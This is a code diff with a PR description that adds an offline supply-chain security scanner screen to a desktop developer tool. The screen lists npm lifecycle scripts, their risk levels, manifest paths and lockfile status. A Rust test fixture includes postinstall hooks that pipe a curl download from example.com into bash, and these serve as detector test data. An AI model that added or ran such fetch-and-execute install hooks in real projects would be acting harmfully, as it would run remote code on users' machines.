+      <p className="supply-chain-reason">{finding.reason}</p>
+    </article>
+  );
+}
+
+function SectionHeading({ id, title, description }: { id: string; title: string; description: string }) {
+  return (
+    <div className="supply-chain-section-heading">
+      <h2 id={id}>{title}</h2>
+      <p>{description}</p>
+    </div>
+  );
+}
+
+function SummaryCard({ value, label }: { value: number | string; label: string }) {
+  return (
+    <div className="supply-chain-summary-card">
+      <strong>{value}</strong>
+      <span>{label}</span>
+    </div>
+  );
+}
+
+function reportFromOperation(
+  operation: AsyncOperationState<SecurityScanResponse>,
+): SecurityScanResponse | undefined {
+  if ('data' in operation) {
+    return operation.data;
+  }
+
+  return operation.status === 'loading' || operation.status === 'error'
+    ? operation.previous
+    : undefined;
+}
+
+function findLifecycleFinding(script: LifecycleScript, findings: SecurityFinding[]) {
+  return findings.find(
+    (finding) =>
+      finding.package === script.package &&
+      finding.riskLevel === script.riskLevel &&
+      finding.evidence === script.command,
+  );
+}
+
+function sourceForScript(script: LifecycleScript, report: SecurityScanResponse) {
+  const finding = report.findings.find(
+    (candidate) =>
+      candidate.rule === 'suspicious-script' &&
+      candidate.package === script.package &&
+      candidate.evidence === script.command,
+  );
+  return finding?.path ?? report.manifests.find((path) => fileName(path) === 'package.json') ?? 'package.json';
+}
+
+function scanContext(report: SecurityScanResponse, scripts: LifecycleScript[]) {
+  const context = new Set<string>();
+  if (report.manifests.some((path) => fileName(path) === 'package.json') || scripts.length) {
+    context.add('Node');
+  }
+  if (report.manifests.some((path) => fileName(path) === 'Cargo.toml')) {
+    context.add('Rust');
+  }
+  for (const script of scripts) {
+    context.add(script.packageManager);
+  }
+  for (const lockfile of report.lockfiles) {
+    if (lockfile.kind === 'PackageLockJson') context.add('npm');
+    if (lockfile.kind === 'PnpmLockYaml') context.add('pnpm');
+    if (lockfile.kind === 'BunLock') context.add('bun');
+    if (lockfile.kind === 'CargoLock') context.add('Cargo');
+  }
+  return [...context];
+}
+
+function highestRiskLevel(findings: SecurityFinding[]): RiskLevel | null {
+  const order: RiskLevel[] = ['None', 'Low', 'Medium', 'High', 'Critical'];
+  return findings.reduce<RiskLevel | null>((highest, finding) => {
+    if (!highest || order.indexOf(finding.riskLevel) > order.indexOf(highest)) {
+      return finding.riskLevel;
+    }
+    return highest;
+  }, null);
+}
+
+function findingLabel(rule: string) {
+  return rule
+    .split('-')
+    .map((part) => part.charAt(0).toUpperCase() + part.slice(1))
+    .join(' ');
+}
+
+function lockfileFormatLabel(kind: LockfileCheck['kind']) {
+  switch (kind) {
+    case 'PackageLockJson':
+      return 'npm';
+    case 'PnpmLockYaml':
+      return 'pnpm';
+    case 'BunLock':
+      return 'bun';
+    case 'CargoLock':
+      return 'Cargo';
+  }
+}
+
+function fileName(path: string) {
+  return path.split(/[\\/]/).pop() ?? path;
+}

--- a/apps/tauri/src/features/app-shell/views/SupplyChainView.tsx
+++ b/apps/tauri/src/features/app-shell/views/SupplyChainView.tsx
@@ -92,7 +92,7 @@ function SupplyChainResults({
   const findings = report.findings ?? [];
   const lifecycleFindings = findings.filter((finding) => finding.rule === 'suspicious-script');
   const dependencyFindings = findings.filter((finding) => finding.rule !== 'suspicious-script');
-  const highestRisk = highestRiskLevel(findings);
+  const highestRisk = highestRiskLevel(findings, lifecycleScripts);
   const hasSupportedInput =
     report.manifests.length > 0 || report.lockfiles.length > 0 || lifecycleScripts.length > 0;
   const hasUnsupportedScope =
@@ -164,7 +164,6 @@ function SupplyChainResults({
                 key={`${script.package}-${script.scriptType}-${index}`}
                 script={script}
                 finding={findLifecycleFinding(script, lifecycleFindings)}
-                source={sourceForScript(script, report)}
               />
             ))}
           </div>
@@ -233,22 +232,21 @@ function SupplyChainResults({
 function LifecycleScriptCard({
   script,
   finding,
-  source,
 }: {
   script: LifecycleScript;
   finding: SecurityFinding | undefined;
-  source: string;
 }) {
   const risk = finding?.riskLevel ?? script.riskLevel;
+  const cardRisk = finding ? risk : 'None';
 
   return (
-    <article className={`supply-chain-card supply-chain-risk-${risk.toLowerCase()}`}>
+    <article className={`supply-chain-card supply-chain-risk-${cardRisk.toLowerCase()}`}>
       <div className="supply-chain-card-header">
         <div>
           <span className="supply-chain-card-kicker">{script.scriptType}</span>
           <h3>{script.package}</h3>
         </div>
-        <span className="supply-chain-risk-badge">{finding ? risk : 'Safe'}</span>
+        <span className="supply-chain-risk-badge">{finding ? risk : 'No finding'}</span>
       </div>
       <dl className="supply-chain-details">
         <div>
@@ -257,7 +255,11 @@ function LifecycleScriptCard({
         </div>
         <div>
           <dt>Source</dt>
-          <dd title={source}>{source}</dd>
+          <dd title={script.manifestPath}>{script.manifestPath}</dd>
+        </div>
+        <div>
+          <dt>Core risk classification</dt>
+          <dd>{script.riskLevel}</dd>
         </div>
         <div>
           <dt>Command</dt>
@@ -349,16 +351,6 @@ function findLifecycleFinding(script: LifecycleScript, findings: SecurityFinding
   );
 }
 
-function sourceForScript(script: LifecycleScript, report: SecurityScanResponse) {
-  const finding = report.findings.find(
-    (candidate) =>
-      candidate.rule === 'suspicious-script' &&
-      candidate.package === script.package &&
-      candidate.evidence === script.command,
-  );
-  return finding?.path ?? report.manifests.find((path) => fileName(path) === 'package.json') ?? 'package.json';
-}
-
 function scanContext(report: SecurityScanResponse, scripts: LifecycleScript[]) {
   const context = new Set<string>();
   if (report.manifests.some((path) => fileName(path) === 'package.json') || scripts.length) {
@@ -379,11 +371,13 @@ function scanContext(report: SecurityScanResponse, scripts: LifecycleScript[]) {
   return [...context];
 }
 
-function highestRiskLevel(findings: SecurityFinding[]): RiskLevel | null {
+function highestRiskLevel(findings: SecurityFinding[], scripts: LifecycleScript[]): RiskLevel | null {
   const order: RiskLevel[] = ['None', 'Low', 'Medium', 'High', 'Critical'];
-  return findings.reduce<RiskLevel | null>((highest, finding) => {
-    if (!highest || order.indexOf(finding.riskLevel) > order.indexOf(highest)) {
-      return finding.riskLevel;
+  return [...findings.map((finding) => finding.riskLevel), ...scripts.map((script) => script.riskLevel)].reduce<
+    RiskLevel | null
+  >((highest, risk) => {
+    if (!highest || order.indexOf(risk) > order.indexOf(highest)) {
+      return risk;
     }
     return highest;
   }, null);

--- a/apps/tauri/src/model/categories.test.ts
+++ b/apps/tauri/src/model/categories.test.ts
@@ -26,13 +26,13 @@ describe('desktop module navigation', () => {
     ]);
   });
 
-  it('marks only existing workflows as available', () => {
+  it('marks implemented desktop modules as available', () => {
     expect(categoryConfig('cleanup-rust')?.availability).toBe('available');
     expect(categoryConfig('cleanup-node')?.availability).toBe('available');
     expect(categoryConfig('cleanup-java')?.availability).toBe('available');
     expect(categoryConfig('workspace-activity')?.availability).toBe('available');
     expect(categoryConfig('cleanup-cache')?.availability).toBe('planned');
-    expect(categoryConfig('security-supply-chain')?.availability).toBe('planned');
+    expect(categoryConfig('security-supply-chain')?.availability).toBe('available');
     expect(categoryConfig('workspace-artifact-history')?.availability).toBe('planned');
   });
 });

--- a/apps/tauri/src/model/categories.ts
+++ b/apps/tauri/src/model/categories.ts
@@ -105,9 +105,9 @@ export const categoryConfigs: CategoryConfig[] = [
   {
     key: 'security-supply-chain',
     title: 'Supply Chain',
-    description: 'Future dependency and lifecycle security analysis',
+    description: 'Offline dependency and lifecycle security analysis',
     section: 'security',
-    availability: 'planned',
+    availability: 'available',
   },
   {
     key: 'security-github-actions',

--- a/apps/tauri/src/styles/style.css
+++ b/apps/tauri/src/styles/style.css
@@ -2162,3 +2162,375 @@ button:disabled {
     grid-template-columns: 1fr;
   }
 }
+
+.supply-chain-view {
+  display: flex;
+  width: 100%;
+  height: 100%;
+  min-width: 0;
+  min-height: 0;
+  flex-direction: column;
+  gap: 20px;
+  overflow-x: hidden;
+  overflow-y: auto;
+  padding: 26px 28px 30px;
+}
+
+.supply-chain-header {
+  display: flex;
+  align-items: flex-start;
+  justify-content: space-between;
+  gap: 20px;
+  flex: 0 0 auto;
+}
+
+.supply-chain-heading {
+  display: flex;
+  max-width: 780px;
+  min-width: 0;
+  flex-direction: column;
+  gap: 7px;
+}
+
+.supply-chain-heading h1 {
+  margin: 0;
+  color: #f5f7fb;
+  font-size: 24px;
+  letter-spacing: -0.025em;
+}
+
+.supply-chain-heading p {
+  margin: 0;
+  color: #a3adb9;
+  font-size: 13px;
+  line-height: 1.5;
+}
+
+.supply-chain-heading .supply-chain-root {
+  overflow: hidden;
+  color: #7f8996;
+  font-size: 11px;
+  text-overflow: ellipsis;
+  white-space: nowrap;
+}
+
+.supply-chain-scan-button {
+  min-height: 34px;
+  flex: 0 0 auto;
+  padding: 0 14px;
+  border: 1px solid rgba(127, 211, 244, 0.45);
+  border-radius: 7px;
+  background: #2d9bc4;
+  color: #06151d;
+  font-size: 13px;
+  font-weight: 700;
+  white-space: nowrap;
+}
+
+.supply-chain-scan-button:hover:not(:disabled) {
+  background: #57b9df;
+}
+
+.supply-chain-scan-button:disabled {
+  cursor: default;
+  border-color: rgba(255, 255, 255, 0.1);
+  background: #46484d;
+  color: #949ba5;
+}
+
+.supply-chain-view > .async-state-panel,
+.supply-chain-results > .async-state-panel {
+  width: 100%;
+  max-width: none;
+  flex: 0 0 auto;
+}
+
+.supply-chain-results,
+.supply-chain-section {
+  display: flex;
+  min-width: 0;
+  flex-direction: column;
+  gap: 12px;
+}
+
+.supply-chain-results {
+  gap: 18px;
+}
+
+.supply-chain-scan-error {
+  padding: 10px 12px;
+  border: 1px solid rgba(242, 112, 112, 0.28);
+  border-radius: 6px;
+  background: rgba(180, 55, 55, 0.1);
+  color: #f6aaaa;
+  font-size: 12px;
+  line-height: 1.5;
+}
+
+.supply-chain-summary-grid {
+  display: grid;
+  grid-template-columns: repeat(4, minmax(0, 1fr));
+  gap: 10px;
+}
+
+.supply-chain-summary-card {
+  display: flex;
+  min-width: 0;
+  min-height: 78px;
+  justify-content: space-between;
+  flex-direction: column;
+  gap: 5px;
+  padding: 13px 14px;
+  border: 1px solid rgba(255, 255, 255, 0.08);
+  border-radius: 7px;
+  background: #25272a;
+}
+
+.supply-chain-summary-card strong {
+  overflow: hidden;
+  color: #f1f5f8;
+  font-size: 18px;
+  font-weight: 700;
+  text-overflow: ellipsis;
+  white-space: nowrap;
+}
+
+.supply-chain-summary-card span {
+  color: #a8b2bd;
+  font-size: 11px;
+}
+
+.supply-chain-section-heading {
+  display: flex;
+  align-items: baseline;
+  justify-content: space-between;
+  gap: 12px;
+}
+
+.supply-chain-section-heading h2 {
+  margin: 0;
+  color: #eef3f7;
+  font-size: 16px;
+}
+
+.supply-chain-section-heading p {
+  max-width: 720px;
+  margin: 4px 0 0;
+  color: #87919e;
+  font-size: 11px;
+  line-height: 1.45;
+}
+
+.supply-chain-script-list,
+.supply-chain-finding-list {
+  display: grid;
+  min-width: 0;
+  gap: 8px;
+}
+
+.supply-chain-card {
+  min-width: 0;
+  padding: 13px 14px;
+  border: 1px solid rgba(255, 255, 255, 0.08);
+  border-radius: 7px;
+  background: #25272a;
+}
+
+.supply-chain-card-header {
+  display: flex;
+  align-items: flex-start;
+  justify-content: space-between;
+  gap: 12px;
+}
+
+.supply-chain-card-kicker {
+  color: #8bd5f4;
+  font-size: 10px;
+  font-weight: 700;
+  letter-spacing: 0.06em;
+  text-transform: uppercase;
+}
+
+.supply-chain-card h3 {
+  margin: 4px 0 0;
+  color: #f1f5f8;
+  font-size: 13px;
+  font-weight: 700;
+}
+
+.supply-chain-risk-badge,
+.supply-chain-lockfile-status {
+  display: inline-flex;
+  min-height: 20px;
+  align-items: center;
+  flex: 0 0 auto;
+  padding: 0 7px;
+  border-radius: 5px;
+  background: rgba(255, 255, 255, 0.09);
+  color: #c8d0d9;
+  font-size: 10px;
+  font-weight: 700;
+  letter-spacing: 0.04em;
+  text-transform: uppercase;
+}
+
+.supply-chain-risk-high .supply-chain-risk-badge,
+.supply-chain-risk-critical .supply-chain-risk-badge {
+  background: rgba(242, 112, 112, 0.13);
+  color: #f6aaaa;
+}
+
+.supply-chain-risk-medium .supply-chain-risk-badge {
+  background: rgba(247, 190, 91, 0.13);
+  color: #f7d797;
+}
+
+.supply-chain-risk-none .supply-chain-risk-badge {
+  background: rgba(103, 207, 153, 0.11);
+  color: #b6e7cc;
+}
+
+.supply-chain-details {
+  display: grid;
+  gap: 7px;
+  margin: 12px 0 0;
+}
+
+.supply-chain-details div {
+  display: grid;
+  grid-template-columns: 115px minmax(0, 1fr);
+  gap: 10px;
+  min-width: 0;
+}
+
+.supply-chain-details dt {
+  color: #7f8996;
+  font-size: 10px;
+  font-weight: 700;
+  text-transform: uppercase;
+}
+
+.supply-chain-details dd {
+  min-width: 0;
+  margin: 0;
+  overflow: hidden;
+  color: #c7ced7;
+  font-size: 11px;
+  text-overflow: ellipsis;
+  white-space: nowrap;
+}
+
+.supply-chain-evidence {
+  color: #a9e0f4 !important;
+  font-family: ui-monospace, SFMono-Regular, Menlo, monospace;
+}
+
+.supply-chain-reason {
+  margin: 12px 0 0;
+  color: #aeb8c3;
+  font-size: 11px;
+  line-height: 1.5;
+}
+
+.supply-chain-lockfile-table {
+  min-width: 0;
+  overflow: hidden;
+  border: 1px solid rgba(255, 255, 255, 0.08);
+  border-radius: 7px;
+  background: #25272a;
+}
+
+.supply-chain-lockfile-row {
+  display: grid;
+  grid-template-columns: minmax(180px, 1.5fr) minmax(100px, 0.8fr) minmax(100px, 0.8fr);
+  align-items: center;
+  min-width: 0;
+  min-height: 42px;
+  gap: 12px;
+  padding: 0 12px;
+  border-bottom: 1px solid rgba(255, 255, 255, 0.055);
+  color: #c7ced7;
+  font-size: 11px;
+}
+
+.supply-chain-lockfile-row:last-child {
+  border-bottom: 0;
+}
+
+.supply-chain-lockfile-row > span:first-child {
+  overflow: hidden;
+  text-overflow: ellipsis;
+  white-space: nowrap;
+}
+
+.supply-chain-lockfile-header {
+  min-height: 31px;
+  background: #292a2d;
+  color: #828c99;
+  font-size: 10px;
+  font-weight: 700;
+  letter-spacing: 0.07em;
+  text-transform: uppercase;
+}
+
+.supply-chain-lockfile-clean {
+  background: rgba(103, 207, 153, 0.11);
+  color: #b6e7cc;
+}
+
+.supply-chain-lockfile-modified,
+.supply-chain-lockfile-missing {
+  background: rgba(242, 112, 112, 0.13);
+  color: #f6aaaa;
+}
+
+.supply-chain-lockfile-untracked {
+  background: rgba(247, 190, 91, 0.13);
+  color: #f7d797;
+}
+
+.supply-chain-section-empty {
+  margin: 0;
+  padding: 14px;
+  border: 1px dashed rgba(255, 255, 255, 0.12);
+  border-radius: 7px;
+  color: #87919e;
+  font-size: 11px;
+  line-height: 1.5;
+}
+
+@media (max-width: 760px) {
+  .supply-chain-view {
+    padding: 18px 14px 24px;
+  }
+
+  .supply-chain-header {
+    flex-direction: column;
+  }
+
+  .supply-chain-scan-button {
+    width: 100%;
+  }
+
+  .supply-chain-summary-grid {
+    grid-template-columns: repeat(2, minmax(0, 1fr));
+  }
+}
+
+@media (max-width: 560px) {
+  .supply-chain-summary-grid {
+    grid-template-columns: 1fr;
+  }
+
+  .supply-chain-details div,
+  .supply-chain-lockfile-row {
+    grid-template-columns: minmax(0, 1fr);
+    gap: 3px;
+    padding-top: 8px;
+    padding-bottom: 8px;
+  }
+
+  .supply-chain-lockfile-header {
+    display: none;
+  }
+}

--- a/apps/tauri/src/types/workflow.ts
+++ b/apps/tauri/src/types/workflow.ts
@@ -153,6 +153,7 @@ export type CleanupResultResponse = {
 
 export type LifecycleScript = {
   package: string;
+  manifestPath: string;
   packageManager: PackageManager;
   scriptType: ScriptType;
   command: string;

--- a/apps/tauri/src/types/workflow.ts
+++ b/apps/tauri/src/types/workflow.ts
@@ -167,6 +167,7 @@ export type SecurityWarning = {
   scriptType: string;
   command: string;
   riskLevel: RiskLevel;
+  reason: string;
 };
 
 export type LockfileCheck = {
@@ -177,6 +178,7 @@ export type LockfileCheck = {
 
 export type SecurityScanResponse = {
   findings: SecurityFinding[];
+  lifecycleScripts: LifecycleScript[];
   lifecycleWarnings: SecurityWarning[];
   lockfiles: LockfileCheck[];
   manifests: string[];

--- a/crates/core/src/audit_tool/lifecycle.rs
+++ b/crates/core/src/audit_tool/lifecycle.rs
@@ -48,7 +48,7 @@ fn audit_scan_package(
     let json = fs::read_to_string(path)?;
     let package = parse_package_json(path, &json)?;
 
-    Ok(lifecycle_scripts(package, package_manager))
+    Ok(lifecycle_scripts(path, package, package_manager))
 }
 
 fn parse_package_json(path: &Path, json: &str) -> DustResult<PackageJson> {
@@ -59,6 +59,7 @@ fn parse_package_json(path: &Path, json: &str) -> DustResult<PackageJson> {
 }
 
 fn lifecycle_scripts(
+    manifest_path: &Path,
     package: PackageJson,
     package_manager: crate::models::PackageManager,
 ) -> Vec<LifecycleScript> {
@@ -75,6 +76,7 @@ fn lifecycle_scripts(
 
         Some(LifecycleScript {
             package: package_name.clone(),
+            manifest_path: manifest_path.to_path_buf(),
             package_manager,
             script_type,
             risk_level: audit_tool::classify(&command),

--- a/crates/core/src/audit_tool/lifecycle_tests.rs
+++ b/crates/core/src/audit_tool/lifecycle_tests.rs
@@ -67,6 +67,10 @@ fn audit_scan_detects_pnpm_dependency_lifecycle_scripts() {
 
     assert_eq!(scripts.len(), 1);
     assert_eq!(scripts[0].package, "left-pad");
+    assert_eq!(
+        scripts[0].manifest_path,
+        dependency_dir.join("package.json")
+    );
     assert_eq!(scripts[0].package_manager, PackageManager::Pnpm);
     assert_eq!(scripts[0].script_type, ScriptType::Postinstall);
     assert_eq!(scripts[0].risk_level, RiskLevel::High);

--- a/crates/core/src/audit_tool/mod.rs
+++ b/crates/core/src/audit_tool/mod.rs
@@ -28,22 +28,26 @@ pub(crate) fn suspicious_command_rule(
 }
 
 pub fn security_scan(root: &Path) -> DustResult<Vec<SecurityWarning>> {
-    lifecycle::audit_scan(root).map(|scripts| {
-        scripts
-            .into_iter()
-            .filter_map(|script| {
-                let rule = rule::find(&script.command)?;
+    audit_scan(root).map(|scripts| security_warnings(&scripts))
+}
 
-                Some(SecurityWarning {
-                    package: script.package,
-                    script_type: script.script_type.to_string(),
-                    command: script.command,
-                    risk_level: rule.risk_level,
-                    reason: rule.reason.to_string(),
-                })
+/// Converts an already collected lifecycle audit into suspicious-script warnings.
+/// Keeping this separate lets complete security reports reuse one filesystem traversal.
+pub fn security_warnings(scripts: &[LifecycleScript]) -> Vec<SecurityWarning> {
+    scripts
+        .iter()
+        .filter_map(|script| {
+            let rule = rule::find(&script.command)?;
+
+            Some(SecurityWarning {
+                package: script.package.clone(),
+                script_type: script.script_type.to_string(),
+                command: script.command.clone(),
+                risk_level: rule.risk_level,
+                reason: rule.reason.to_string(),
             })
-            .collect()
-    })
+        })
+        .collect()
 }
 
 #[cfg(test)]

--- a/crates/core/src/models/audit.rs
+++ b/crates/core/src/models/audit.rs
@@ -6,6 +6,7 @@ use super::LockfileCheck;
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
 pub struct LifecycleScript {
     pub package: String,
+    pub manifest_path: PathBuf,
     pub package_manager: PackageManager,
     pub script_type: ScriptType,
     pub command: String,
@@ -105,6 +106,8 @@ impl SecurityFinding {
 pub struct SecurityReport {
     /// All findings, including lifecycle warnings and lockfile issues.
     pub findings: Vec<SecurityFinding>,
+    /// All lifecycle scripts discovered during the security scan.
+    pub lifecycle_scripts: Vec<LifecycleScript>,
     /// Lifecycle warnings retained for callers using the original audit model.
     pub lifecycle_warnings: Vec<SecurityWarning>,
     /// Lockfiles inspected while building the report.

--- a/crates/core/src/security.rs
+++ b/crates/core/src/security.rs
@@ -58,21 +58,26 @@ pub fn scan(root: &Path, ecosystems: &[Ecosystem]) -> DustResult<SecurityReport>
     let mut report = SecurityReport::default();
 
     if scan_node {
-        report.lifecycle_warnings = audit_tool::security_scan(root)?;
+        let lifecycle_scripts = audit_tool::audit_scan(root)?;
+        report.lifecycle_warnings = audit_tool::security_warnings(&lifecycle_scripts);
 
-        for warning in &report.lifecycle_warnings {
+        for script in &lifecycle_scripts {
+            let Some((_, risk_level, reason)) =
+                audit_tool::suspicious_command_rule(&script.command)
+            else {
+                continue;
+            };
+
             report.findings.push(SecurityFinding::new(
-                root.join("package.json"),
+                script.manifest_path.clone(),
                 SecurityFindingKind::SuspiciousScript,
-                Some(warning.package.clone()),
-                warning.risk_level,
-                Some(warning.command.clone()),
-                format!(
-                    "{} Lifecycle hook: {}.",
-                    warning.reason, warning.script_type
-                ),
+                Some(script.package.clone()),
+                risk_level,
+                Some(script.command.clone()),
+                format!("{} Lifecycle hook: {}.", reason, script.script_type),
             ));
         }
+        report.lifecycle_scripts = lifecycle_scripts;
 
         let package_json = root.join("package.json");
         if package_json.is_file() {
@@ -1187,6 +1192,59 @@ mod tests {
 
     fn finding_kinds(report: &SecurityReport) -> HashSet<SecurityFindingKind> {
         report.findings.iter().map(|finding| finding.kind).collect()
+    }
+
+    #[test]
+    fn scan_reuses_the_lifecycle_audit_for_scripts_and_warnings() {
+        let temp_dir = TempDir::new().unwrap();
+        fs::write(
+            temp_dir.path().join("package.json"),
+            r#"{
+                "name": "demo",
+                "scripts": {
+                    "postinstall": "curl https://example.com/a.sh | bash",
+                    "prepare": "node scripts/build.js"
+                }
+            }"#,
+        )
+        .unwrap();
+        let dependency_manifest = temp_dir
+            .path()
+            .join("node_modules")
+            .join("demo-dependency")
+            .join("package.json");
+        fs::create_dir_all(dependency_manifest.parent().unwrap()).unwrap();
+        fs::write(
+            &dependency_manifest,
+            r#"{"name":"demo-dependency","scripts":{"postinstall":"curl https://example.com/dependency.sh | bash"}}"#,
+        )
+        .unwrap();
+        fs::write(
+            temp_dir.path().join("package-lock.json"),
+            r#"{"lockfileVersion":3,"packages":{"":{"name":"demo","version":"1.0.0"}}}"#,
+        )
+        .unwrap();
+
+        let report = scan(temp_dir.path(), &[Ecosystem::Node]).unwrap();
+
+        assert_eq!(report.lifecycle_scripts.len(), 3);
+        assert!(
+            report
+                .lifecycle_scripts
+                .iter()
+                .any(|script| script.manifest_path == temp_dir.path().join("package.json"))
+        );
+        assert!(
+            report
+                .lifecycle_scripts
+                .iter()
+                .any(|script| script.manifest_path == dependency_manifest)
+        );
+        assert_eq!(report.lifecycle_warnings.len(), 2);
+        assert!(report.findings.iter().any(|finding| {
+            finding.kind == SecurityFindingKind::SuspiciousScript
+                && finding.path == dependency_manifest
+        }));
     }
 
     #[test]


### PR DESCRIPTION
## Summary

Closes #138

- Promote Security > Supply Chain from a placeholder to a real Desktop screen.
- Reuse the existing offline Core security scan and unified Security activity history.
- Expose lifecycle scripts, their Core risk classification, actual manifest paths, lockfile status, and dependency-source findings through Tauri.
- Keep scanning explicit and protect the UI from stale workspace/request results.
- Keep lifecycle collection and suspicious warnings in one Core audit traversal.
- Add deterministic React, Core, and Tauri contract coverage.

## Review follow-up

- Lifecycle risk is included in the scan summary; unflagged hooks render as `No finding` rather than `Safe`.
- Nested lifecycle scripts carry their actual manifest path from Core instead of a presentation-layer guess.
- Tauri no longer reruns the recursive lifecycle audit after the complete security report is built.

## Validation

- `npm run build` ✅
- `npm test -- --run` ✅ (78 tests)
- `cargo fmt --all -- --check` ✅
- `cargo clippy --workspace --all-targets -- -D warnings` ✅
- `cargo test --workspace` ✅ (358 tests: 27 CLI, 306 Core, 25 Tauri)
- `cargo llvm-cov --workspace --all-features --summary-only` ✅ (77.46% regions, 77.13% lines)